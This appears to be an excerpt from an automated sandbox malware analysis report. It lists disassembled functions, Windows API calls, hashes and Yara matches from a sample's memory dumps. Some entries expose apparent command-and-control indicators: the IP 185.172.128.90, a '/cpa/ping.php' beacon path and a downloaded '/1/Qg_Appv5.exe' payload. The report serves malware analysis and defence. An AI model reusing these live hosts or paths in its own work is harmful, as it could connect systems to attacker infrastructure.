  • Part of subcall function 0041DE54: GetOEMCP.KERNEL32(00000000,?,?,0041E0DD,?), ref: 0041DE7F
• IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0041E122,?,00000000), ref: 0041E2F5
• GetCPInfo.KERNEL32(00000000,"A,?,?,?,0041E122,?,00000000), ref: 0041E308
Strings
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
• API ID: CodeInfoPageValid
• String ID: "A
• API String ID: 546120528-1838006985
• Opcode ID: 1283d02f46e1589de4851ffd21eb46f7b56e6e61e2be4b5569ea5d9b61fcf244
• Instruction ID: 9adfac426f14955098f9a8953225ebda5108e0851b5f4a0d8690ab915da4ef9e
• Opcode Fuzzy Hash: 1283d02f46e1589de4851ffd21eb46f7b56e6e61e2be4b5569ea5d9b61fcf244
• Instruction Fuzzy Hash: 1F511774A002499EDB208F36C8846FBBBE5EF51304F14446FD8A68B251D73D95C6CB99
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 05D065C0
  • Part of subcall function 05CE4073: __EH_prolog.LIBCMT ref: 05CE4078
  • Part of subcall function 05CE4073: std::locale::_Init.LIBCPMT ref: 05CE409A
• _Deallocate.LIBCONCRT ref: 05D06714
Strings
Memory Dump Source
• Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
Yara matches
Similarity
• API ID: H_prolog$DeallocateInitstd::locale::_
• String ID: hzB
• API String ID: 2389838984-4102550090
• Opcode ID: bd51143135a8815fbe86bb61eaf86818a294b752ba5ce55ce2693886611e2087
• Instruction ID: a16ef0aea8af23f9608b81b026acbf1e97a4cb1ff2e81b1cbde5869d9de806d1
• Opcode Fuzzy Hash: bd51143135a8815fbe86bb61eaf86818a294b752ba5ce55ce2693886611e2087
• Instruction Fuzzy Hash: 7D51AA71E01248DFDB18DFA9C894AEDBBB5FF58300FA4462EE406A7281D730AA45CF50
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0041DF51
Strings
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
• API ID: Info
• String ID: $^A
• API String ID: 1807457897-1499568600
• Opcode ID: 83da749ea859946a51b81c35361cbdd594582fb38d57894b34583c031ad0444d
• Instruction ID: 9b2ab00e05afc5395f67001553a0f729d0bbf79a9b46b691f859092dfb419bf1
• Opcode Fuzzy Hash: 83da749ea859946a51b81c35361cbdd594582fb38d57894b34583c031ad0444d
• Instruction Fuzzy Hash: 46415CB49042589EDB218E25CC80BFABFE9DB49304F1404EEE58A87143D2799AC6CF64
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0042011D,?,00000050,?,?,?,?,?), ref: 0041FF9D
Strings
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
• API ID:
• String ID: ACP$OCP
• API String ID: 0-711371036
• Opcode ID: 42f9bcd6f4e5afa2ede7f930f8a4cc0c89f81ec70c3ed948d7487cfdec4ae167
• Instruction ID: dacf84d8a1ebef4056087089fc013b288552bfb44d7b698df7e4a4e4da77cf20
• Opcode Fuzzy Hash: 42f9bcd6f4e5afa2ede7f930f8a4cc0c89f81ec70c3ed948d7487cfdec4ae167
• Instruction Fuzzy Hash: F721F472B04101A6D7308B54D901BDBA3A6EB52B24F564077F90AC7301FBBADDCBC258
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,05D00384,?,00000050,?,?,?,?,?), ref: 05D00204
Strings
Memory Dump Source
• Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
Yara matches
Similarity
• API ID:
• String ID: ACP$OCP
• API String ID: 0-711371036
• Opcode ID: 42f9bcd6f4e5afa2ede7f930f8a4cc0c89f81ec70c3ed948d7487cfdec4ae167
• Instruction ID: 2f6cf54d8940304a4f1a7ab04c6f9596c284cd13cd641ec3de4e1f4c49a79963
• Opcode Fuzzy Hash: 42f9bcd6f4e5afa2ede7f930f8a4cc0c89f81ec70c3ed948d7487cfdec4ae167
• Instruction Fuzzy Hash: D021C162B02205B6E7348B64CD08FAB73ABBB54B51FC69427E94AD7180E732D940C392
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

APIs
• GetProcAddress.KERNEL32(00000000,?), ref: 00417217
• __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00417224
Strings
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
• API ID: AddressProc__crt_fast_encode_pointer
• String ID: -@
• API String ID: 2279764990-2564449678
• Opcode ID: 159ffde8afdd61bab2c645bd26f6e363fc6904dc3b18735a3e366a8bdcbdbe8f
• Instruction ID: f4ec00a39f4fcae9ee9be6b99cea2ca8987fdb4a8322dd671adfd3fbebc4ff23
• Opcode Fuzzy Hash: 159ffde8afdd61bab2c645bd26f6e363fc6904dc3b18735a3e366a8bdcbdbe8f
• Instruction Fuzzy Hash: 65110A33A042205B9B369E19EC80ADB73B5EB847247164172FD29BB354DB34DCC2C6D9
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
• API ID: H_prolog
• String ID: /cpa/ping.php?substr=%s&s=ab&sub=%s$one
• API String ID: 3519838083-2876206925
• Opcode ID: f53bc21c6a473a4d107a45cccef11255b17f5841f7796051e35078cbeb47afbb
• Instruction ID: 15a4cf94b989c4b5e0a43b8c54f1cb92ed8d46dd15ee7e513d2018d21c6c36cd
• Opcode Fuzzy Hash: f53bc21c6a473a4d107a45cccef11255b17f5841f7796051e35078cbeb47afbb
• Instruction Fuzzy Hash: AB11C232A01014BBDB00AF89DC01BAEB779EF49314F40003EF805A3291D3799B5187A8
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
Yara matches
Similarity
• API ID: H_prolog
• String ID: /cpa/ping.php?substr=%s&s=ab&sub=%s$one
• API String ID: 3519838083-2876206925
• Opcode ID: f53bc21c6a473a4d107a45cccef11255b17f5841f7796051e35078cbeb47afbb
• Instruction ID: 5d6f884e2a631f0378571fbcfb45b7c6e67310de4c9c38802ab535244214e57a
• Opcode Fuzzy Hash: f53bc21c6a473a4d107a45cccef11255b17f5841f7796051e35078cbeb47afbb
• Instruction Fuzzy Hash: ED11E172A00115BBDB059F88CC44BEEB7B9FF49610F10492AF804E7240D374BA10DBA0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 00402FEA
• std::locale::_Init.LIBCPMT ref: 0040300E
  • Part of subcall function 00407D73: __EH_prolog3.LIBCMT ref: 00407D7A
  • Part of subcall function 00407D73: std::_Lockit::_Lockit.LIBCPMT ref: 00407D85
  • Part of subcall function 00407D73: std::locale::_Setgloballocale.LIBCPMT ref: 00407DA0
  • Part of subcall function 00407D73: _Yarn.LIBCPMT ref: 00407DB6
  • Part of subcall function 00407D73: std::_Lockit::~_Lockit.LIBCPMT ref: 00407DF6
Strings
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
• API ID: Lockitstd::_std::locale::_$H_prologH_prolog3InitLockit::_Lockit::~_SetgloballocaleYarn
• String ID: T*@
• API String ID: 4198646248-2370032326
• Opcode ID: d0eaefa58f6fde832fef2458de955be1af219eff9044b882e2f0086fe7818694
• Instruction ID: dd23321e4c46181b40e5f98da61592ca99a58c04279906981af05f8f2703ec12
• Opcode Fuzzy Hash: d0eaefa58f6fde832fef2458de955be1af219eff9044b882e2f0086fe7818694
• Instruction Fuzzy Hash: 2321B0B5A00A06AFC305CF6AD581995FBF4FF48314B40826FE80987B50E774B924CFA4
Uniqueness
• Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 00404373
  • Part of subcall function 00403A42: __EH_prolog.LIBCMT ref: 00403A47
• __Getcoll.LIBCPMT ref: 004043CF
Strings
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
• API ID: H_prolog$Getcoll
• String ID: u@@
• API String ID: 206117190-736001340
• Opcode ID: d664a231bda773a3cd6c064b295e09fc09c6187729f09baed323597af0611d79
• Instruction ID: c779ab9f98323ff8677db40664eca0c2ffeff6dd5383222ff5ea7a01e0671416
• Opcode Fuzzy Hash: d664a231bda773a3cd6c064b295e09fc09c6187729f09baed323597af0611d79
• Instruction Fuzzy Hash: 871170B19012099FCB04EFA9C581A9DF7B4FF44304F10847FE545BB281DB789A44CB95
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetTempPathA.KERNEL32(00002000,?,?,/1/Qg_Appv5.exe,00425B8E,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 00426324
Strings
Memory Dump Source
• Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
Similarity
• API ID: PathTemp
• String ID: /1/Qg_Appv5.exe$Qg_Appv5.exe
• API String ID: 2920410445-1161945460
• Opcode ID: 95d314670ccd1522b250ad5fefde607822e255a2179401dbe6e03e497b03dfc3
• Instruction ID: d0e7d276ca818b5a52dc3a1143c2d6cc19e203c39cc505e05bbffc3e6100e946
• Opcode Fuzzy Hash: 95d314670ccd1522b250ad5fefde607822e255a2179401dbe6e03e497b03dfc3
• Instruction Fuzzy Hash: 17E026123088110A5F29482D3818AAFDF03DFD261038582AAD88307345CD410C0BD2B0
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetTempPathA.KERNEL32(00002000,?,?,/1/Qg_Appv5.exe,05D05DF5,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 05D0658B
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1926817341.0000000005CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CE0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_5ce0000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: PathTemp
                                                                                                                                                                                                                                  • String ID: /1/Qg_Appv5.exe$Qg_Appv5.exe
                                                                                                                                                                                                                                  • API String ID: 2920410445-1161945460
                                                                                                                                                                                                                                  • Opcode ID: 95d314670ccd1522b250ad5fefde607822e255a2179401dbe6e03e497b03dfc3
                                                                                                                                                                                                                                  • Instruction ID: c1d77b6f8993cd132e41a49579af4bdbfb7721c3a288bd8c724747b730525d1b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 95d314670ccd1522b250ad5fefde607822e255a2179401dbe6e03e497b03dfc3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AFE086122048511A5F29492A7819ABBDF57EFC751034892ABE88657689CD515C0BD270
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?), ref: 0041A893
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0041A8A1
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0041A8FC
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.1738735258.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.1738735258.000000000043E000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_400000_B46afLBMY0mokUgVdA9CQR52.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1717984340-0
                                                                                                                                                                                                                                  • Opcode ID: b4f25852fafc3cb0f15b20596d9ae719c618a575aca992b75c45ceb5274d71e6
                                                                                                                                                                                                                                  • Instruction ID: ef74c1d6368c920b9f03e6eff6a6fb43ae41f0a69c5039c94680ed31baa92590
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b4f25852fafc3cb0f15b20596d9ae719c618a575aca992b75c45ceb5274d71e6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4D410770602206AFCB219F65C844AEF7BA4AF01310F16456FED599B291DB388CE2C75A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%